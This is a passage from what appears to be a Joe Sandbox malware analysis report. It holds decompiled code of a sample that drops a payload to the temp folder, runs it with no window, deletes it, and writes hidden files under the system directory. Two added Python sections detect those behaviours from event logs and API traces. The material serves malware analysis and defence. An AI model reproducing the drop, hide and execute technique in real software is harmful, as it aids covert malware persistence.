                                                                                													}
                                                                                													goto L45;
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                										L228:
                                                                                										__imp__#3(_v16);
                                                                                										E0012E318();
                                                                                										return _v68;
                                                                                									} else {
                                                                                										__imp__#3(_v16);
                                                                                										goto L21;
                                                                                									}
                                                                                								}
                                                                                								L15:
                                                                                								__imp__#3(_v16); // executed
                                                                                							}
                                                                                							return E0012C8AA(_t829);
                                                                                						} else {
                                                                                							_t805 =  *0x133670; // 0x2
                                                                                							while(_v12 < _t805) {
                                                                                								_t7 = _t747 + 1; // 0x1
                                                                                								asm("cdq");
                                                                                								_t747 = _t7 % _t805;
                                                                                								 *0x13367c =  *0x13367c + 1;
                                                                                								_v12 = _v12 + 1;
                                                                                								 *0x133674 = _t747;
                                                                                								if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) == 0) {
                                                                                									continue;
                                                                                								}
                                                                                								goto L11;
                                                                                							}
                                                                                							goto L11;
                                                                                						}
                                                                                					}
                                                                                					_t686 = E0012EBCC(0x100000);
                                                                                					 *0x1336b0 = _t686;
                                                                                					if(_t686 == 0) {
                                                                                						goto L21;
                                                                                					}
                                                                                					goto L7;
                                                                                				}
                                                                                				_t820 =  *0x133670; // 0x2
                                                                                				if(_t820 != 0) {
                                                                                					goto L3;
                                                                                				}
                                                                                				goto L2;
                                                                                			}
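The branch above is the sample's drop-and-run step: GetTempPathA, a random lowercase name of (rand & 3) + 5 characters, CreateFileA/WriteFile of the embedded image (body from offset 0xc, length minus 0xc), CreateProcessA with dwCreationFlags 0x8000000 (CREATE_NO_WINDOW), WaitForSingleObject for 0xea60 (60000 ms), a stored timestamp bumped by 0xe10 (3600), then DeleteFileA of the temp file. The Python below is an added illustration, not Joe Sandbox output and not code from the sample: it reproduces the naming loop and correlates write, execute and delete of one temp file over a constructed set of Sysmon-style events. Assumed for illustration: the temp directory, the event schema, the omission of the 5-byte string the sample appends to the name (it is decrypted at run time and not shown), and the "%s %s" layout of the command line (wsprintfA uses a decrypted 12-byte format string, so the order is a guess; the SysWOW64 service path it receives is the one in the listing).

```python
import random
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constants taken from the decompiled calls above.
CREATE_NO_WINDOW = 0x08000000   # dwCreationFlags given to CreateProcessA
WAIT_MS = 0xEA60                # 60000 ms given to WaitForSingleObject
RETRY_SECS = 0xE10              # 3600 added to the stored timestamp after the run

# Assumed for illustration: GetTempPathA returns the caller's %TEMP%.
TEMP = r"C:\Users\user\AppData\Local\Temp"


def temp_drop_stem(seed: int) -> str:
    """Mirror of the naming loop: count = (rand & 3) + 5 characters, each
    rand % 26 + 'a'. Python's PRNG stands in for the sample's E0012ECA5,
    so only the shape (5..8 lowercase letters) is reproduced, not its output.
    The 5-byte string the sample appends afterwards is decrypted at run
    time and not visible in the listing, so it is left off here."""
    rng = random.Random(seed)
    count = (rng.getrandbits(15) & 3) + 5
    return "".join(chr(rng.getrandbits(15) % 26 + ord("a")) for _ in range(count))


# Name as generated above; the extension is kept optional for the reason given.
DROP_NAME_RE = re.compile(r"^[a-z]{5,8}(\.[a-z0-9]{1,4})?$", re.IGNORECASE)


@dataclass
class Event:
    """Constructed Sysmon-like record: file write, process start or file delete."""
    ts: float          # seconds
    kind: str          # "FileCreate", "ProcessCreate" or "FileDelete"
    pid: int           # acting process (parent PID for ProcessCreate)
    path: str          # file written/deleted, or image launched
    cmdline: str = ""


def is_temp_drop(path: str, temp_dir: str) -> bool:
    """True if path sits directly in temp_dir and its name fits the scheme."""
    parent, _, name = path.rpartition("\\")
    return parent.lower() == temp_dir.rstrip("\\").lower() and bool(DROP_NAME_RE.match(name))


def find_drop_run_delete(events: List[Event], temp_dir: str,
                         window_s: float = WAIT_MS / 1000 + 5) -> List[Tuple[int, str, str]]:
    """Correlate write -> execute -> delete of one temp file by one process.
    The 60 s wait cap bounds how long the dropped file lives, hence the window.
    Returns (pid, dropped_path, child_cmdline) for each chain found."""
    hits = []
    ordered = sorted(events, key=lambda e: e.ts)
    for i, w in enumerate(ordered):
        if w.kind != "FileCreate" or not is_temp_drop(w.path, temp_dir):
            continue
        later = ordered[i + 1:]
        run = next((e for e in later if e.kind == "ProcessCreate" and e.pid == w.pid
                    and e.path.lower() == w.path.lower() and e.ts - w.ts <= window_s), None)
        if run is None:
            continue
        gone = next((e for e in later if e.kind == "FileDelete" and e.pid == w.pid
                     and e.path.lower() == w.path.lower()
                     and run.ts <= e.ts <= w.ts + window_s), None)
        if gone is not None:
            hits.append((w.pid, w.path, run.cmdline))
    return hits


# Constructed sample telemetry. The command line carries the SysWOW64 service
# path shown in the listing; the "%s %s" ordering is assumed.
SERVICE_EXE = r"C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe"
DROPPED = TEMP + r"\kqzrbf.exe"
SAMPLE_EVENTS = [
    Event(0.0, "FileCreate", 1234, DROPPED),
    Event(0.1, "ProcessCreate", 1234, DROPPED, cmdline=f"{DROPPED} {SERVICE_EXE}"),
    Event(2.5, "FileDelete", 1234, DROPPED),
    # Benign: an installer writes and removes a temp file it never runs.
    Event(5.0, "FileCreate", 999, TEMP + r"\setup_log.tmp"),
    Event(6.0, "FileDelete", 999, TEMP + r"\setup_log.tmp"),
    # Matching name, but written and launched by different processes: no chain.
    Event(7.0, "FileCreate", 42, TEMP + r"\abcdef.exe"),
    Event(7.5, "ProcessCreate", 77, TEMP + r"\abcdef.exe"),
    Event(8.0, "FileDelete", 42, TEMP + r"\abcdef.exe"),
]

if __name__ == "__main__":
    print("generated stem:", temp_drop_stem(1))
    for pid, path, cmdline in find_drop_run_delete(SAMPLE_EVENTS, TEMP):
        print(f"pid {pid} dropped, ran and deleted {path}: {cmdline}")
```

With real telemetry the three kinds map to Sysmon event IDs 11 (FileCreate), 1 (ProcessCreate) and 23 (FileDelete). The correlation keys on the same acting PID and the same path, which is what separates this pattern from installers that also write and remove temp files; the name regex alone would be too noisy, and the delete within the 60 s wait window is the part worth alerting on.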
                                                                                0x0012d9ab
                                                                                0x0012d9b4
                                                                                0x0012d9b9
                                                                                0x0012d9be
                                                                                0x0012d9be
                                                                                0x0012d9c1
                                                                                0x0012d9c7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d9c7
                                                                                0x0012d969
                                                                                0x0012d96f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d96f
                                                                                0x0012d8da
                                                                                0x0012d8df
                                                                                0x0012d8e4
                                                                                0x0012d8e7
                                                                                0x0012d8e7
                                                                                0x0012d8ea
                                                                                0x0012d8ea
                                                                                0x0012d8ec
                                                                                0x0012d8ed
                                                                                0x0012d8ed
                                                                                0x0012d8f1
                                                                                0x0012d8f3
                                                                                0x0012d8f6
                                                                                0x0012d8f8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d903
                                                                                0x0012d918
                                                                                0x0012d92a
                                                                                0x0012d92f
                                                                                0x0012d932
                                                                                0x0012d934
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d934
                                                                                0x0012d7a8
                                                                                0x0012d7aa
                                                                                0x0012d7b0
                                                                                0x0012d7be
                                                                                0x0012d7c3
                                                                                0x0012d7cf
                                                                                0x0012d7d6
                                                                                0x0012d7e1
                                                                                0x0012d7e2
                                                                                0x0012d7e2
                                                                                0x0012d7e5
                                                                                0x0012d7ed
                                                                                0x0012d7ee
                                                                                0x0012d7f4
                                                                                0x0012d81f
                                                                                0x0012d825
                                                                                0x0012d828
                                                                                0x0012d828
                                                                                0x0012d82a
                                                                                0x0012d830
                                                                                0x0012d832
                                                                                0x0012d85b
                                                                                0x0012d85b
                                                                                0x0012d85d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d878
                                                                                0x0012d87f
                                                                                0x0012d884
                                                                                0x0012d887
                                                                                0x0012d889
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d88f
                                                                                0x0012d895
                                                                                0x0012d897
                                                                                0x0012d897
                                                                                0x0012d89d
                                                                                0x0012d8a2
                                                                                0x0012d8a4
                                                                                0x0012d8a7
                                                                                0x0012d8ad
                                                                                0x0012d8ad
                                                                                0x00000000
                                                                                0x0012d834
                                                                                0x0012d834
                                                                                0x0012d836
                                                                                0x0012d836
                                                                                0x0012d839
                                                                                0x0012d839
                                                                                0x0012d83b
                                                                                0x0012d83c
                                                                                0x0012d83c
                                                                                0x0012d842
                                                                                0x0012d847
                                                                                0x0012d850
                                                                                0x0012d855
                                                                                0x0012d858
                                                                                0x0012d858
                                                                                0x00000000
                                                                                0x0012d858
                                                                                0x0012d832
                                                                                0x0012d783
                                                                                0x0012d792
                                                                                0x0012d797
                                                                                0x0012d79a
                                                                                0x0012d79c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d773
                                                                                0x0012d778
                                                                                0x0012d77b
                                                                                0x0012d77d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d77d
                                                                                0x00000000
                                                                                0x0012d783
                                                                                0x0012d70d
                                                                                0x0012d712
                                                                                0x0012d718
                                                                                0x0012d71f
                                                                                0x0012d721
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d73d
                                                                                0x0012d744
                                                                                0x0012d749
                                                                                0x0012d74c
                                                                                0x0012d74e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d74e
                                                                                0x0012d6d3
                                                                                0x0012d6f0
                                                                                0x0012d6f7
                                                                                0x0012d6fc
                                                                                0x0012d6ff
                                                                                0x0012d701
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d701
                                                                                0x0012d67a
                                                                                0x0012d67b
                                                                                0x0012d67c
                                                                                0x0012d6bb
                                                                                0x0012d6bb
                                                                                0x0012d6c0
                                                                                0x0012d6c3
                                                                                0x0012d6c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d67f
                                                                                0x0012d696
                                                                                0x0012d69d
                                                                                0x0012d6a2
                                                                                0x0012d6a5
                                                                                0x0012d6a7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d6b0
                                                                                0x0012d6b0
                                                                                0x0012d6b3
                                                                                0x0012d6b4
                                                                                0x0012d6b5
                                                                                0x0012d6b5
                                                                                0x00000000
                                                                                0x0012d6bb
                                                                                0x0012cbc7
                                                                                0x0012cbca
                                                                                0x0012d5f2
                                                                                0x0012d5f8
                                                                                0x0012d5fa
                                                                                0x0012d600
                                                                                0x0012d611
                                                                                0x0012d616
                                                                                0x0012d61e
                                                                                0x0012d621
                                                                                0x0012d623
                                                                                0x0012d62e
                                                                                0x0012d635
                                                                                0x0012d637
                                                                                0x0012d63d
                                                                                0x0012d643
                                                                                0x0012d649
                                                                                0x0012d64f
                                                                                0x0012d655
                                                                                0x0012d65a
                                                                                0x0012d65a
                                                                                0x0012d637
                                                                                0x0012d623
                                                                                0x00000000
                                                                                0x0012d5fa
                                                                                0x0012cbd0
                                                                                0x0012cbd3
                                                                                0x0012d5e1
                                                                                0x0012cdec
                                                                                0x00000000
                                                                                0x0012cdec
                                                                                0x0012cbd9
                                                                                0x0012d589
                                                                                0x0012d589
                                                                                0x0012d589
                                                                                0x0012d58b
                                                                                0x0012d58b
                                                                                0x0012d58b
                                                                                0x0012d591
                                                                                0x0012d593
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d595
                                                                                0x0012d598
                                                                                0x0012d59a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d59c
                                                                                0x0012d59e
                                                                                0x0012d59e
                                                                                0x0012d5a1
                                                                                0x0012d5a1
                                                                                0x0012d5a3
                                                                                0x0012d5a5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d5a7
                                                                                0x0012d5aa
                                                                                0x0012d5c3
                                                                                0x0012d5c5
                                                                                0x00000000
                                                                                0x0012d5c5
                                                                                0x0012d5ac
                                                                                0x0012d5ad
                                                                                0x0012d5b0
                                                                                0x0012d5b3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d5b5
                                                                                0x0012d5c8
                                                                                0x0012d5c8
                                                                                0x0012d5cb
                                                                                0x0012d5cb
                                                                                0x00000000
                                                                                0x0012d5d3
                                                                                0x0012cbdf
                                                                                0x0012cbe2
                                                                                0x0012ce26
                                                                                0x0012ce2c
                                                                                0x0012ce2e
                                                                                0x0012ce31
                                                                                0x0012ce34
                                                                                0x0012ce36
                                                                                0x0012cea0
                                                                                0x0012cea0
                                                                                0x0012cea8
                                                                                0x0012cea8
                                                                                0x0012ceaf
                                                                                0x0012ceb9
                                                                                0x0012cebf
                                                                                0x0012cec2
                                                                                0x0012d53e
                                                                                0x0012d53e
                                                                                0x0012d541
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012cec9
                                                                                0x0012cecc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012ced2
                                                                                0x0012ced5
                                                                                0x0012d519
                                                                                0x0012d519
                                                                                0x0012d524
                                                                                0x0012d526
                                                                                0x0012d529
                                                                                0x0012d53b
                                                                                0x00000000
                                                                                0x0012cedb
                                                                                0x0012cee8
                                                                                0x0012ceed
                                                                                0x0012ceef
                                                                                0x0012cef2
                                                                                0x0012cef4
                                                                                0x0012cef9
                                                                                0x0012cefe
                                                                                0x0012cf00
                                                                                0x0012cf00
                                                                                0x0012cf02
                                                                                0x0012cf02
                                                                                0x0012cf04
                                                                                0x0012cf06
                                                                                0x0012cf0b
                                                                                0x0012cf0d
                                                                                0x0012cf12
                                                                                0x0012cf14
                                                                                0x0012cf1a
                                                                                0x0012cf20
                                                                                0x0012cf20
                                                                                0x0012cf1c
                                                                                0x0012cf1c
                                                                                0x0012cf1c
                                                                                0x0012ce1b
                                                                                0x00000000
                                                                                0x0012ce1b
                                                                                0x0012cbfb
                                                                                0x0012cc00
                                                                                0x0012cc02
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012cc08
                                                                                0x0012cc0d
                                                                                0x0012cc10
                                                                                0x0012cc16
                                                                                0x0012cdd2
                                                                                0x0012cdd2
                                                                                0x0012cdd8
                                                                                0x0012cde2
                                                                                0x0012cde7
                                                                                0x00000000
                                                                                0x0012cc1c
                                                                                0x0012cc28
                                                                                0x0012cc35
                                                                                0x0012cc3a
                                                                                0x0012cc3b
                                                                                0x0012cc47
                                                                                0x0012cc4a
                                                                                0x0012cc64
                                                                                0x0012cc64
                                                                                0x0012cc66
                                                                                0x0012cc4c
                                                                                0x0012cc55
                                                                                0x0012cc58
                                                                                0x0012cc5b
                                                                                0x0012cc62
                                                                                0x0012cc63
                                                                                0x0012cc63
                                                                                0x00000000
                                                                                0x0012cc68
                                                                                0x0012cc8d
                                                                                0x0012cc9a
                                                                                0x0012cc9f
                                                                                0x0012ccb4
                                                                                0x0012ccba
                                                                                0x0012ccbd
                                                                                0x0012ccc0
                                                                                0x0012ccdc
                                                                                0x0012cce2
                                                                                0x0012cce5
                                                                                0x0012cce7
                                                                                0x0012cdcc
                                                                                0x0012cced
                                                                                0x0012cced
                                                                                0x0012ccf3
                                                                                0x0012ccfe
                                                                                0x0012cd21
                                                                                0x0012cd2a
                                                                                0x0012cd31
                                                                                0x0012cd3b
                                                                                0x0012cd47
                                                                                0x0012cd4d
                                                                                0x0012cd52
                                                                                0x0012cd55
                                                                                0x0012cd77
                                                                                0x0012cd7d
                                                                                0x0012cd7f
                                                                                0x0012cd89
                                                                                0x0012cd98
                                                                                0x0012cd9d
                                                                                0x0012cda5
                                                                                0x0012cda5
                                                                                0x0012cdaa
                                                                                0x0012cdac
                                                                                0x0012cdad
                                                                                0x0012cdb2
                                                                                0x0012cdb2
                                                                                0x0012cdb8
                                                                                0x0012cdc4
                                                                                0x0012cdc4
                                                                                0x0012cce7
                                                                                0x00000000
                                                                                0x0012ccc0
                                                                                0x0012cc66
                                                                                0x0012cc16
                                                                                0x0012dad2
                                                                                0x0012dad5
                                                                                0x0012dadb
                                                                                0x00000000
                                                                                0x0012cb60
                                                                                0x0012cb63
                                                                                0x00000000
                                                                                0x0012cb63
                                                                                0x0012cb5e
                                                                                0x0012ca4b
                                                                                0x0012ca4e
                                                                                0x0012ca4e
                                                                                0x00000000
                                                                                0x0012c9d2
                                                                                0x0012c9d2
                                                                                0x0012c9d8
                                                                                0x0012c9dd
                                                                                0x0012c9e0
                                                                                0x0012c9e1
                                                                                0x0012c9e3
                                                                                0x0012c9e9
                                                                                0x0012c9f1
                                                                                0x0012c9fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012c9fb
                                                                                0x00000000
                                                                                0x0012c9d8
                                                                                0x0012c9d0
                                                                                0x0012c9a5
                                                                                0x0012c9ab
                                                                                0x0012c9b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012c9b2
                                                                                0x0012c92f
                                                                                0x0012c935
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • closesocket.WS2_32(?), ref: 0012CA4E
                                                                                • closesocket.WS2_32(?), ref: 0012CB63
                                                                                • GetTempPathA.KERNEL32(00000120,?), ref: 0012CC28
                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0012CCB4
                                                                                • WriteFile.KERNEL32(0012A4B3,?,-000000E8,?,00000000), ref: 0012CCDC
                                                                                • CloseHandle.KERNEL32(0012A4B3), ref: 0012CCED
                                                                                • wsprintfA.USER32 ref: 0012CD21
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0012CD77
                                                                                • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0012CD89
                                                                                • CloseHandle.KERNEL32(?), ref: 0012CD98
                                                                                • CloseHandle.KERNEL32(?), ref: 0012CD9D
                                                                                • DeleteFileA.KERNEL32(?), ref: 0012CDC4
                                                                                • CloseHandle.KERNEL32(0012A4B3), ref: 0012CDCC
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0012CFB1
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 0012CFEF
                                                                                • GetSystemDirectoryA.KERNEL32 ref: 0012D033
                                                                                • lstrcatA.KERNEL32(?,03E00108), ref: 0012D10C
                                                                                • SetFileAttributesA.KERNEL32(?,00000080), ref: 0012D155
                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0012D171
                                                                                • WriteFile.KERNEL32(00000000,03E0012C,?,?,00000000), ref: 0012D195
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0012D19C
                                                                                • SetFileAttributesA.KERNEL32(?,00000002), ref: 0012D1C8
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0012D231
                                                                                • lstrcatA.KERNEL32(?,03E00108,?,?,?,?,?,?,?,00000100), ref: 0012D27C
                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0012D2AB
                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0012D2C7
                                                                                • WriteFile.KERNEL32(00000000,03E0012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0012D2EB
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0012D2F2
                                                                                • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0012D326
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0012D372
                                                                                • lstrcatA.KERNEL32(?,03E00108,?,?,?,?,?,?,?,00000100), ref: 0012D3BD
                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0012D3EC
                                                                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0012D408
                                                                                • WriteFile.KERNEL32(00000000,03E0012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0012D428
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0012D42F
                                                                                • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0012D45B
                                                                                • CreateProcessA.KERNEL32(?,00130264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0012D4DE
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0012D4F4
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0012D4FC
                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0012D513
                                                                                • closesocket.WS2_32(?), ref: 0012D56C
                                                                                • Sleep.KERNEL32(000003E8), ref: 0012D577
                                                                                • ExitProcess.KERNEL32 ref: 0012D583
                                                                                • wsprintfA.USER32 ref: 0012D81F
                                                                                  • Part of subcall function 0012C65C: send.WS2_32(00000000,?,00000000), ref: 0012C74B
                                                                                • closesocket.WS2_32(?), ref: 0012DAD5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
                                                                                • String ID: .dat$.sys$4$@$C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
                                                                                • API String ID: 562065436-3866487918
                                                                                • Opcode ID: e1dcc2fff9de347e08d4c5b7f92e564f800640902165c3409acd3eccebe6c867
                                                                                • Instruction ID: a87e5d6aa5723a839b0d99326e3bb80f02502eb87e41f002d1f527640a7dafb0
                                                                                • Opcode Fuzzy Hash: e1dcc2fff9de347e08d4c5b7f92e564f800640902165c3409acd3eccebe6c867
                                                                                • Instruction Fuzzy Hash: 20B2B7B1900228AFEB15EFA4FD46EEE7BFDEB18304F140069F605A7191D7709AA5CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
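The API listing above records two behaviours a responder would want to flag mechanically: a payload written under the temp path, executed with CREATE_NO_WINDOW (0x08000000), waited on for 0xEA60 = 60000 ms and then deleted; and a file written under the system directory whose attributes are reset to FILE_ATTRIBUTE_NORMAL (0x80) before writing and set to FILE_ATTRIBUTE_HIDDEN (0x02) afterwards. The following Python is an added example, not part of the Joe Sandbox report or of the sample's code: it parses lines in the report's "Function.MODULE(args), ref: ADDR" form and looks for those two ordered call sequences. The sample trace is a constructed, trimmed copy of the listing above; the pattern names, the `Call` type and the helper functions are this example's own inventions.

```python
import re
from typing import Callable, Dict, List, NamedTuple, Optional, Tuple

# Constructed sample: a trimmed copy of the APIs listing above, in the
# "• Function.MODULE(args), ref: ADDR" form Joe Sandbox emits.
SAMPLE_TRACE = """\
• closesocket.WS2_32(?), ref: 0012CB63
• GetTempPathA.KERNEL32(00000120,?), ref: 0012CC28
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0012CCB4
• WriteFile.KERNEL32(0012A4B3,?,-000000E8,?,00000000), ref: 0012CCDC
• CloseHandle.KERNEL32(0012A4B3), ref: 0012CCED
• wsprintfA.USER32 ref: 0012CD21
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0012CD77
• WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0012CD89
• DeleteFileA.KERNEL32(?), ref: 0012CDC4
• GetSystemDirectoryA.KERNEL32 ref: 0012CFEF
• lstrcatA.KERNEL32(?,03E00108), ref: 0012D10C
• SetFileAttributesA.KERNEL32(?,00000080), ref: 0012D155
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0012D171
• WriteFile.KERNEL32(00000000,03E0012C,?,?,00000000), ref: 0012D195
• CloseHandle.KERNEL32(00000000), ref: 0012D19C
• SetFileAttributesA.KERNEL32(?,00000002), ref: 0012D1C8
"""

# Win32 constants used by the two patterns (values as documented by Microsoft).
GENERIC_WRITE = 0x40000000
CREATE_ALWAYS = 0x2
CREATE_NO_WINDOW = 0x08000000
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_NORMAL = 0x80


class Call(NamedTuple):
    func: str
    module: str
    args: List[Optional[int]]  # None where the report shows "?"
    ref: int                   # call-site address from the "ref:" field


_LINE = re.compile(
    r"^\s*•\s*(?P<func>\w+)\.(?P<mod>\w+)"     # e.g. CreateFileA.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?"                # argument list is optional
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"    # call-site address
)


def _arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16)  # int() accepts the leading '-' of values like -000000E8


def parse_trace(text: str) -> List[Call]:
    """Parse the report's API lines; lines in another shape (e.g. the
    'Part of subcall function ...' entries) are skipped."""
    calls: List[Call] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_arg(a) for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("func"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


def _flag(c: Call, i: int, mask: int) -> bool:
    return i < len(c.args) and c.args[i] is not None and (c.args[i] & mask) == mask


def _eq(c: Call, i: int, value: int) -> bool:
    return i < len(c.args) and c.args[i] == value


Step = Tuple[str, Optional[Callable[[Call], bool]]]


def find_sequence(calls: List[Call], steps: List[Step], start: int = 0) -> Optional[List[Call]]:
    """Match steps in order, allowing unrelated calls in between.
    Returns the matched calls, or None if the sequence does not occur."""
    matched: List[Call] = []
    pos = start
    for func, pred in steps:
        while pos < len(calls):
            c = calls[pos]
            pos += 1
            if c.func == func and (pred is None or pred(c)):
                matched.append(c)
                break
        else:
            return None
    return matched


# Pattern names are this example's own; the call shapes come from the listing.
PATTERNS: Dict[str, List[Step]] = {
    # temp-path drop, hidden-window execution, then self-cleanup of the payload
    "drop_execute_delete": [
        ("GetTempPathA", None),
        ("CreateFileA", lambda c: _flag(c, 1, GENERIC_WRITE) and _eq(c, 4, CREATE_ALWAYS)),
        ("WriteFile", None),
        ("CreateProcessA", lambda c: _flag(c, 5, CREATE_NO_WINDOW)),
        ("DeleteFileA", None),
    ],
    # write under the system directory, then hide the result via attributes
    "hidden_drop_in_system_dir": [
        ("GetSystemDirectoryA", None),
        ("SetFileAttributesA", lambda c: _eq(c, 1, FILE_ATTRIBUTE_NORMAL)),
        ("CreateFileA", lambda c: _eq(c, 4, CREATE_ALWAYS)),
        ("WriteFile", None),
        ("SetFileAttributesA", lambda c: _flag(c, 1, FILE_ATTRIBUTE_HIDDEN)),
    ],
}


def detect(text: str) -> Dict[str, List[int]]:
    """Return {pattern_name: [call-site addresses]} for every pattern found."""
    calls = parse_trace(text)
    hits: Dict[str, List[int]] = {}
    for name, steps in PATTERNS.items():
        m = find_sequence(calls, steps)
        if m:
            hits[name] = [c.ref for c in m]
    return hits


if __name__ == "__main__":
    for name, refs in detect(SAMPLE_TRACE).items():
        print(name, [f"{r:08X}" for r in refs])
```

The matcher tolerates unrelated calls between steps (the CloseHandle, wsprintfA and WaitForSingleObject entries in the listing), but requires the flag values that make the sequence suspicious: a CreateProcessA without CREATE_NO_WINDOW, or a CreateFileA that is not CREATE_ALWAYS, does not satisfy the step. Argument positions marked "?" in the report parse as None and never satisfy a flag check, so a missing value cannot produce a false match.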

                                                                                C-Code - Quality: 89%
                                                                                			_entry_(CHAR* _a12, void* _a15) {
                                                                                				char _v8;
                                                                                				char _v12;
                                                                                				intOrPtr _v16;
                                                                                				char _v20;
                                                                                				void* _v24;
                                                                                				char _v28;
                                                                                				char _v32;
                                                                                				union _GET_FILEEX_INFO_LEVELS _v36;
                                                                                				CHAR* _v40;
                                                                                				char _v44;
                                                                                				char _v48;
                                                                                				struct _PROCESS_INFORMATION _v64;
                                                                                				char _v80;
                                                                                				char _v112;
                                                                                				char _v371;
                                                                                				char _v372;
                                                                                				char _v671;
                                                                                				char _v672;
                                                                                				char _v704;
                                                                                				struct _STARTUPINFOA _v772;
                                                                                				char _v1271;
                                                                                				char _v1272;
                                                                                				char _v1672;
                                                                                				char _t238;
                                                                                				long _t239;
                                                                                				char _t242;
                                                                                				long _t244;
                                                                                				CHAR* _t248;
                                                                                				char _t250;
                                                                                				intOrPtr _t257;
                                                                                				char _t267;
                                                                                				intOrPtr* _t272;
                                                                                				char _t276;
                                                                                				char _t279;
                                                                                				char _t282;
                                                                                				char _t283;
                                                                                				void* _t284;
                                                                                				char _t294;
                                                                                				CHAR* _t303;
                                                                                				int _t304;
                                                                                				char _t309;
                                                                                				CHAR* _t312;
                                                                                				char _t318;
                                                                                				int _t324;
                                                                                				CHAR* _t325;
                                                                                				char _t328;
                                                                                				char* _t331;
                                                                                				char _t332;
                                                                                				char _t340;
                                                                                				char _t344;
                                                                                				CHAR* _t357;
                                                                                				CHAR* _t358;
                                                                                				int _t359;
                                                                                				int _t373;
                                                                                				long _t379;
                                                                                				void* _t383;
                                                                                				void* _t396;
                                                                                				void* _t401;
